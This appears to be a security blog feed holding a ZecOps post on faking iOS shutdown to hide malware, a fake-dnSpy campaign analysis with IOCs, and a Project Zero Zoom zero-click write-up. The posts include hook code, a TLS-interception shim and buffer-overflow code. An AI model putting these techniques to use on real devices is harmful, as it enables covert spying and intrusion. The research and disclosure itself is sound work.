
2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: “At the time, no one knew what was coming.”

― Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (“His voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”) However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months for reasons outside her control. Unable to take even a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as “languishing” – the indeterminate void between depression and flourishing. To combat this, it suggested rediscovering one’s “flow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag an OpenAI GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security’s Exploit Developer course, which I then applied to my research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into vulnerability research reminded me just how vast this ocean is; it’ll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spider-Man will tell you. I suspect that “same same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Persistence without “Persistence”: Meet The Ultimate Persistence Bug – “NoReboot”

4 January 2022 at 20:49

Mobile Attacker’s Mindset Series – Part II

Evaluating how attackers operate when there are no rules leads to the discovery of advanced detection and response mechanisms. ZecOps proudly researches attack scenarios and shares the information publicly for the benefit of all the mobile defenders out there.

iOS persistence is presumed to be one of the hardest bugs to find: the attack surface is somewhat limited and constantly analyzed by Apple’s security teams.

Creativity is a key element of the hacker’s mindset. Persistence can be hard if attackers play by the rules. As you may have guessed already, attackers do not play by the rules, and everything is possible.

In part II of the Attacker’s Mindset series we’ll go over the ultimate persistence bug: a bug that cannot be patched because it doesn’t exploit any persistence vulnerability at all, only tricks of the human mind.

Meet “NoReboot”: The Ultimate Persistence Bug

We’ll dissect the iOS system and show how it’s possible to alter a shutdown event, tricking an infected user into thinking that the phone has been powered off when, in fact, it is still running. The “NoReboot” approach simulates a real shutdown: the user cannot tell the difference between a real shutdown and a “fake shutdown”. There is no user interface or button feedback until the user turns the phone back “on”.

To demonstrate this technique, we’ll show the remote microphone and camera being accessed after “turning off” the phone, with the malware “persisting” when the phone is brought back to a “powered on” state.

This blog can also be an excellent tutorial for anyone who may be interested in learning how to reverse engineer iOS.

Nowadays, many of us have tons of applications installed on our phones, and it is difficult to determine which of them are abusing our data and privacy. Our information is constantly being collected and uploaded.

This story by Dan Goodin describes iOS malware discovered in the wild. One sentence in the article reads: “The installed malware…can’t persist after a device reboot, … phones are disinfected as soon as they’re restarted.”

The reality is actually a bit more complicated than that. As we will be able to demonstrate in this blog, we cannot, and should not, trust a “normal reboot”.

How Are We Supposed to Reboot iPhones?

According to Apple, a phone is rebooted by pressing the Volume Down and Power buttons and then dragging the slider.

Given that the iPhone has no internal fan and usually stays cool, it’s not trivial to tell whether the phone is running. For end users, the most intuitive indicator that the phone is on is feedback from the screen: we tap the screen or click the side button to wake it up.

Here is a list of physical feedback that constantly reminds us that the phone is powered on:

  • Ring/Sound from incoming calls and notifications
  • Touch feedback (3D touch)
  • Vibration (silent mode switch triggers a burst of vibration)
  • Screen
  • Camera indicator

“NoReboot”: Hijacking the Shutdown Event

Let’s see if we can disable all of the indicators above while keeping the phone with the trojan still running. Let’s start by hijacking the shutdown event, which involves injecting code into three daemons.

When you slide to power off, it is actually a system application /Applications/InCallService.app sending a shutdown signal to SpringBoard, which is a daemon that is responsible for the majority of the UI interaction.

We managed to hijack the signal by hooking the Objective-C method -[FBSSystemService shutdownWithOptions:]. Now instead of sending a shutdown signal to SpringBoard, it will notify both SpringBoard and backboardd to trigger the code we injected into them.
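As a minimal sketch of what such a hook might look like, here is the same idea expressed against the Objective-C runtime’s C API (the post does not say which hooking framework was used, and start_fake_poweroff is a hypothetical stand-in for the injected logic described below):

#include <objc/runtime.h>

static IMP orig_shutdown;

// Hypothetical helper: starts the fake power-off sequence described below
// (hide the spinner, take down SpringBoard) instead of really shutting down.
static void start_fake_poweroff(void) { /* ... */ }

// Replacement implementation: swallow the shutdown request entirely.
static void fake_shutdown(id self, SEL _cmd, id options) {
    (void)self; (void)_cmd; (void)options;
    // Deliberately NOT calling orig_shutdown: the device must stay up.
    start_fake_poweroff();
}

// Runs when the injected dylib is loaded into the calling process.
__attribute__((constructor))
static void install_hook(void) {
    Class cls = objc_getClass("FBSSystemService");
    Method m = class_getInstanceMethod(cls, sel_registerName("shutdownWithOptions:"));
    if (m)
        orig_shutdown = method_setImplementation(m, (IMP)fake_shutdown);
}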

In backboardd, we hide the spinning-wheel animation that automatically appears when SpringBoard stops running; the magic spell that does this is [[BKSDefaults localDefaults] setHideAppleLogoOnLaunch:1]. Then we make SpringBoard exit and block it from launching again. Because SpringBoard is responsible for responding to user behavior and interaction, without it the device looks and feels as if it is not powered on, which is the perfect disguise for mimicking a fake power-off.

Example of SpringBoard responding to user interaction: detecting the long-press action and invoking Siri.

Even though we disabled all physical feedback, the phone remains fully functional and is capable of maintaining an active internet connection. The malicious actor could remotely manipulate the phone in a blatant way without worrying about being caught, because the user is tricked into thinking the phone is off, whether it was “turned off” by the victim or by the malicious actor using “low battery” as an excuse.

Later we will demonstrate eavesdropping through cam & mic while the phone is “off”. In reality, malicious actors can do anything the end-user can do and more. 

System Boot In Disguise

Now the user wants to turn the phone back on. The system boot animation with Apple’s logo convinces the end user that the phone really had been turned off.

When SpringBoard is not on duty, backboardd is in charge of the screen. According to the description of backboardd on theiphonewiki (https://www.theiphonewiki.com/wiki/Backboardd), “All touch events are first processed by this daemon, then translated and relayed to the iOS application in the foreground”. We found this statement to be accurate. Moreover, backboardd relays not only touch events but also physical button click events.

backboardd logs the exact time when a button is pressed down, and when it’s been released. 

With help from cycript, we found a way to intercept that event using Objective-C method hooking.

A _BKButtonEventRecord instance is created and inserted into a global dictionary object, BKEventSenderUsagePairDictionary. We hook the insertion method to detect when the user attempts to “turn on” the phone.

The file then unleashes SpringBoard and triggers a special code block in our injected dylib. It leverages local SSH access to gain root privileges, then executes /bin/launchctl reboot userspace. This exits all processes and restarts the system without touching the kernel. The kernel remains patched, so malicious code won’t have any problem continuing to run after this kind of reboot.

The user will see the Apple logo effect upon restarting; this is handled by backboardd as well. Once SpringBoard launches, backboardd lets it take over the screen.

From that point, the interactive UI is presented to the user. Everything feels right, as all processes have indeed been restarted. A non-persistent threat has thus achieved “persistence” without any persistence exploit.

Hijacking the Force Restart Event?

A user can perform a “force restart” by quickly pressing “Volume Up”, then “Volume Down”, then long-pressing the power button until the Apple logo appears.

We have not found an easy way to hijack the force-restart event, as it is implemented at a much lower level; according to the Apple support page referenced below, it is done in hardware. After a brief search in the iOS kernel, we could not find what triggers the force-restart event. The good news is that this makes it harder for malicious actors to disable force restarts; on the other hand, end users face a risk of data loss, as the system does not have enough time to securely write data to disk during a force restart.

Misleading Force Restart

Nevertheless, it is entirely possible for malicious actors to observe the user’s attempt to perform a force restart (via backboardd) and deliberately make the Apple logo appear a few seconds early, deceiving the user into releasing the button sooner than they were supposed to. In that case, the end user has not actually triggered a force restart. We will leave this as an exercise for the reader.

Ref: https://support.apple.com/guide/iphone/force-restart-iphone-iph8903c3ee6/ios

NoReboot Proof of Concept

You can find the source code of NoReboot POC here.

Never trust a device to be off

In iOS 15, Apple introduced a new feature that allows users to track their phone even when it has been turned off. Malware researcher @naehrdine wrote a technical analysis of this feature and shared her opinion on its “Security and privacy impact”. We agree with her: “Never trust a device to be off, until you removed its battery or even better put it into a Blender.”

Checking if your phone is compromised

ZecOps for Mobile leverages extended data collection and enables responding to security events. If you’d like to inspect your phone – please feel free to request a free trial here.

Fake dnSpy - When Even Hackers Don’t Play Fair

By: liuchuang
12 January 2022 at 13:06

Background

dnSpy is a popular tool for debugging, modifying, and decompiling .NET programs. Security researchers frequently use it when analyzing .NET applications and malware.

On 8 January 2022, BLEEPING COMPUTER reported that attackers had launched a campaign against security researchers and developers using a malicious build of dnSpy. @MalwareHunterTeam published tweets disclosing the GitHub repositories distributing the malicious dnSpy build, which goes on to install a clipboard hijacker, Quasar RAT, a cryptominer, and more.

Looking at the official dnSpy Git repository, the project is archived: it stopped receiving updates in 2020 and has no official website.

The attackers took advantage of this by registering the domain dnspy[.]net and building a very polished website to distribute their malicious dnSpy build. They also purchased Google search ads to push the site to the top of the search results and widen their reach.

As of 9 January 2022, the site has been taken offline.

Sample Analysis

dnspy[.]net delivered a modified build of dnSpy 6.1.8, which is also the last version officially released.

The infection is implemented by modifying the entry-point code of dnSpy.dll, one of dnSpy’s core modules. Compared to the normal entry function, the modified entry point additionally loads an executable from memory: a program named dnSpy Reader, which is obfuscated.

It subsequently uses mshta to deliver cryptominers, clipboard hijackers, RATs, and other payloads.

GitHub

The two GitHub repositories created by the attackers are:

  • https[:]//github[.]com/carbonblackz/dnSpy
  • https[:]//github[.]com/isharpdev/dnSpy

The usernames used are isharpdev and carbonblackz; remember these names, as we will encounter them again shortly.

Pivoting on the Attacker’s Assets

Analyzing dnspy[.]net, we found some interesting traces that allowed us to pivot to more of the attacker’s infrastructure:

dnspy.net

The domain dnspy[.]net was registered on 14 April 2021.

The domain has multiple resolution records, most of them pointing to Cloudflare CDN services. However, the historical resolution records show that between 13 December and 3 January the domain used the IP 45.32.253[.]0. Unlike the Cloudflare CDN IPs, this IP has only a small number of mapped domains.

Querying the passive DNS records of this IP shows that most of the domains mapped to it appear to be impersonation domains, and most of them are already offline.

Some of these domains are download sites for hacking tools, office software, and the like, and all of them appear to impersonate legitimate websites.

Together with the dnspy[.]net domain from the disclosed incident, this behavioral pattern leads us to suspect that all of these domains are assets owned by the attacker, so we analyzed them further.

Related Domain Analysis

Take toolbase[.]co as an example: historically it was a hacking-tool download site, and the extraction password for the tools on its homepage is “CarbonBlackz”, the same name as one of the GitHub users who uploaded the malicious dnSpy.

The site later changed its page title to Combolist-Cloud, matching the combolist[.]cloud domain present in the resolution records of 45.32.253[.]0; some of its files are distributed via mediafire or gofile. The domain appears to impersonate combolist[.]top, a forum offering leaked data.

torfiles[.]net is likewise a software download site.

windows-software[.]co and windows-softeware[.]net are download sites built from the same template.

shortbase[.]net has the same CyberPanel setup page as dnspy[.]net, both dated 19 December 2021. The Wayback Machine record of dnspy[.]net shows the identical historical CyberPanel setup page.

coolmint[.]net is another download site, still reachable as of 12 January 2022, but its download links merely redirect to mega[.]nz.

filesr[.]net uses the same template as toolbase[.]co. Its About Us page was not even modified; the content was adapted from the About Us page of FileCR[.]com. The software on filesr[.]net is distributed via Dropbox, but all of the current links are dead.

Finally, zippyfiles[.]net is a hacking-tool download site as well.

We also found a Reddit user named tuki1986 who had spent the previous two months promoting the toolbase[.]co and zippyfiles[.]net sites.

A year earlier, the same user was promoting bigwarez[.]net. Its history shows that it was also a tool download site, linked to several social media accounts:

  • Twitter: @Bigwarez2
  • Facebook: @software.download.free.mana (this account now promotes itools[.]digital, a download site for browser extensions)
  • Facebook group: @free.software.bigwarez
  • LinkedIn (no longer accessible): @free-software-1055261b9
  • Tumblr: @bigwarez

Digging further into tuki1986’s records surfaced another site, blackos[.]net, which is also a hacking-tool download site and is flagged on threat-intelligence platforms for backdoored software.

Through this site we found a user named sadoutlook1992 who has been posting trojanized hacking tools on various hacking forums since 2018. In their latest activity, the download links point to zippyfiles[.]net.

From the malicious GitHub repositories and the archive password we know the username “CarbonBlackz”. Searching for this string turned up a user named “Carbonblackz” on the well-known data-leak site raidforums[.]com. The same name is also registered on a Russian-language cybercrime forum; neither account has posted or replied yet, suggesting they have not been put to use.

The actor has also posted software download links on Vietnam’s largest forum.

Attribution

Checking the WHOIS information of these domains reveals that the contact email for filesr[.]net is [email protected]

Information associated with this mailbox links to a 35-year-old individual, suspected to be from Russia.

Judging from the IDs carbon1986 and tuki1986, 1986 is likely the actor’s birth year, which is also consistent with an age of 35.

Given the interconnections among these domains and their shared behavioral and promotion patterns, we assess that they belong to the same group as the dnspy[.]net attackers.

This is a carefully constructed malicious operation that has been active since at least October 2018. It registers large numbers of websites offering trojanized hacking tools and cracked software for download, and promotes them across multiple social media platforms, thereby infecting hackers, security researchers, software developers, and other users; it then follows up with malicious activity such as cryptomining, cryptocurrency theft, and data theft via RATs.

Conclusion

Trojanized cracked software is nothing new, but attacks targeting security researchers are especially likely to succeed: the sensitive behavior of hacking and analysis tools frequently triggers antivirus detections, so some researchers disable their antivirus software to silence the annoying warnings.

Although most of the group’s malicious websites, GitHub repositories, and malware-distribution links are now defunct, security researchers and developers should remain vigilant at all times. Cracked or leaked hacking tools are best run in a virtual environment, and development and office software should be downloaded from official websites or other legitimate channels, preferably as licensed copies, to avoid unnecessary losses.

IOCs

dnSpy.dll - f00e0affede6e0a533fd0f4f6c71264d

  • IP:
    45.32.253.0

  • Domains:
    zippyfiles.net
    windows-software.net
    filesr.net
    coolmint.net
    windows-software.co
    dnspy.net
    torfiles.net
    combolist.cloud
    toolbase.co
    shortbase.net
    blackos.net
    bigwarez.net
    buysixes.com
    itools.digital
    4api.net

Malware Analysis: Ragnarok Ransomware

By: voidsec
28 April 2021 at 08:13

The analysed sample is malware employed by the threat actor known as Ragnarok. The ransomware is responsible for file encryption and is typically executed by the actors themselves on the compromised machines. The name of the analysed executable is xs_high.exe, but others have been found in use by the same ransomware family (such as […]

The post Malware Analysis: Ragnarok Ransomware appeared first on VoidSec.

Planned Upcoming Classes

15 January 2022 at 09:38

Some people asked me if I had a schedule of trainings I plan to do in the coming months. Well, here it is. At this point I would like to gauge interest, and plan the course hours (time zone) to accommodate the majority of participants.

I am moving to classes that are partly full days and partly half days. The full day sessions are going to be recorded for the participants (so that if anyone misses something because of urgent work, inconvenient time zone, etc., the recording should help). The half days are not recorded, and should be easier to handle, since they are only about 4 hours long.

Here is the planned course list with dates (f=full day, all others are half-days). The cost is in USD (paid by individual / paid by a company):

  • COM Programming with C++ (3 days): April 25, 26, 27, 28, May 2, 3 (Cost: 700/1300)
  • Windows System Programming (5 days): May 16 (f), 17, 18, 19, 23 (f), 24, 25, 26 (Cost: 800/1500)
  • Windows Kernel Programming (4 days): June 6 (f), 8, 9, 13 (f), 14 (Cost: 800/1500)
  • Windows Internals (5 days): July 11 (f), 12, 13, 14, 18 (f), 19, 20, 21 (Cost: 800/1500)
  • Advanced Kernel Programming (New!) (4 days): September 12 (f), 13, 14, 15, 19, 20, 21 (Cost: 800/1500)

“Advanced Kernel Programming” is a new class I’m planning, suitable for those who participated in “Windows Kernel Programming” (or have equivalent knowledge). This course will cover file system mini-filters, NDIS filters, and the Windows Filtering Platform (WFP), along with other advanced programming techniques.

I may add more classes after September, but it’s too far from now to make such a commitment.

If you are interested in one or more of these classes, please write an email to [email protected] and provide your name, preferred contact email, and time zone. It’s not a commitment on your part, and you may change your mind later on, but your interest should be genuine, with dates and topics that work for you.

Also, if you have other classes you would be happy if I deliver, you are welcome to suggest them. No promises, of course, but if there is enough interest, I will consider creating and delivering them.

If you’d like a private class for your team, get in touch. Syllabi can be customized as needed.

Have a great year ahead!


zodiacon

Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.
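The post uses Frida for this hook; purely as an illustration of the same interception idea, a C interposer loaded with LD_PRELOAD could capture the plaintext on the Linux client in a similar way, assuming the client resolves SSL_write dynamically (build with gcc -shared -fPIC -o sslspy.so sslspy.c -ldl, then run the client with LD_PRELOAD=./sslspy.so):

#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>

// Interposed SSL_write: dump the outgoing plaintext, then call the real one.
int SSL_write(void *ssl, const void *buf, int num) {
    static int (*real_write)(void *, const void *, int);
    if (!real_write)
        real_write = (int (*)(void *, const void *, int))dlsym(RTLD_NEXT, "SSL_write");
    if (num > 0)
        fwrite(buf, 1, (size_t)num, stderr);  // XMPP stanzas and other traffic
    fputc('\n', stderr);
    return real_write(ssl, buf, num);
}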

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different from the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub, a relocatable shared object that defined fopen and called the function I wanted to fuzz, and loaded it using LD_PRELOAD when executing the MMR binary. My code would then take control of execution the first time the MMR binary called fopen, and could call the function being fuzzed.
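A rough reconstruction of that stub (with a hypothetical target address and signature, since the post does not give them): a shared object that defines fopen, gets loaded via LD_PRELOAD into the fixed-base MMR binary, and diverts the first fopen call into the function under test.

#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Hypothetical: fixed address of the function under test inside the
// non-relocatable MMR binary; the signature is assumed for illustration.
#define TARGET_FUNC ((void (*)(const uint8_t *, size_t))0x0804a120)

FILE *fopen(const char *path, const char *mode) {
    static int hijacked;
    (void)path; (void)mode;
    if (!hijacked) {
        hijacked = 1;
        static uint8_t buf[0x10000];
        ssize_t n = read(0, buf, sizeof(buf));  // fuzz input arrives on stdin
        if (n > 0)
            TARGET_FUNC(buf, (size_t)n);        // call the parser under test
        _exit(0);                               // never let the MMR continue
    }
    abort();  // this sketch never services a real fopen call
}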

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(
    msg_db, &this->str_len, consume_bytes, error_out);
str_len = this->str_len;
if ( str_len )
{
  mem = operator new[](str_len);
  out_len = 0;
  this->str_mem = mem;
  ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read_str_with_len(
    msg_db_t *msg, signed __int8 *mem, unsigned int *len)
{
  if ( !msg->invalid )
  {
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);
    if ( !msg->invalid )
    {
      if ( *len )
        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::read(msg, mem, *len, 0);
    }
  }
  return msg;
}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).
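As a toy model of the pattern (hypothetical names and layout; the real logic is the decompiled C++ above), the mismatch looks like this: the first length sizes the allocation while the second, independent length drives the copy.

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

// Stand-in for msg_db_t: a cursor over an attacker-controlled buffer.
struct msg_db { const uint8_t *p, *end; };

static uint32_t read_u32(struct msg_db *m) {
    uint32_t v = 0;
    if (m->end - m->p >= 4) { memcpy(&v, m->p, 4); m->p += 4; }
    return v;
}

static uint8_t *load_str(struct msg_db *m) {
    uint32_t alloc_len = read_u32(m);  // first length: sizes the allocation
    uint8_t *mem = malloc(alloc_len);  // like operator new[](str_len)
    uint32_t copy_len = read_u32(m);   // second, independent length
    if (mem)
        memcpy(mem, m->p, copy_len);   // heap overflow when copy_len > alloc_len
    return mem;
}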

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in, was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{
    char type;
    short length;
    var_data data;
};

union var_data{
    char i8;
    char* i8_ptr;
    short i16;
    short* i16_ptr;
    int i32;
    int* i32_ptr;
    long long i64;
    long long* i64_ptr;
};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 for 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer and an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.
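A self-contained toy model (hypothetical, not Zoom code) of that last case shows why a missing null terminator matters when a byte array is converted to a C string:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    // The attacker supplies an 8-byte array variant with no trailing '\0'.
    char *var_data = malloc(8);
    memcpy(var_data, "AAAAAAAA", 8);
    // Converting it to a string assumes a terminator: strdup() keeps reading
    // past the end of the allocation until it happens to hit a zero byte, so
    // the copy can include adjacent heap data (such as pointers).
    char *display_name = strdup(var_data);
    printf("%s\n", display_name);
    return 0;
}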

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

